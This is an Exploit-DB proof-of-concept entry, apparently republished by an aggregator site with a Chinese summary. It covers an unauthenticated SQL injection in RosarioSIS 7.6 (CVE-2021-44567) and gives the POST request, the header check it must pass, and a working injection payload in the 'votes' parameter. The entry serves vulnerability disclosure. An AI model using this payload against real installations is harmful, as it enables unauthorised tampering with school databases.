[webapps] RosarioSIS 7.6 - SQL Injection
RosarioSIS 7.6版本及以下存在未认证SQL注入漏洞,攻击者通过PortalPollsNotes.fnc.php中的votes参数构造恶意请求即可利用该漏洞进行攻击。 2025-4-11 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:2 收藏
RosarioSIS 7.6版本及以下存在未认证SQL注入漏洞,攻击者通过PortalPollsNotes.fnc.php中的votes参数构造恶意请求即可利用该漏洞进行攻击。 2025-4-11 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:2 收藏
# Exploit Title: [RosarioSIS < 7.6.1 Unauthenticated SQL Injection via votes Parameter in PortalPollsNotes.fnc.php]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://gitlab.com/francoisjacquet/rosariosis]
# Software Link: [https://gitlab.com/francoisjacquet/rosariosis]
# Version: [7.6]
# Tested on: [Ubuntu Windows]
# CVE : [CVE-2021-44567]
PoC:
POST /ProgramFunctions/PortalPollsNotes.fnc.php HTTP/1.1
X-Requested-With: XMLHttpRequest
constrain and some flow:
isset( $_POST['votes'] ) && is_array( $_POST['votes'] ) && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' && foreach ( (array) $_POST['votes'] as $poll_id => $votes_array ) && if ( ! empty( $votes_array ) ) && PortalPollsVote( $poll_id, $votes_array )
votes['; CREATE TABLE aaa(t text) --]=1
文章来源: https://www.exploit-db.com/exploits/52169
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh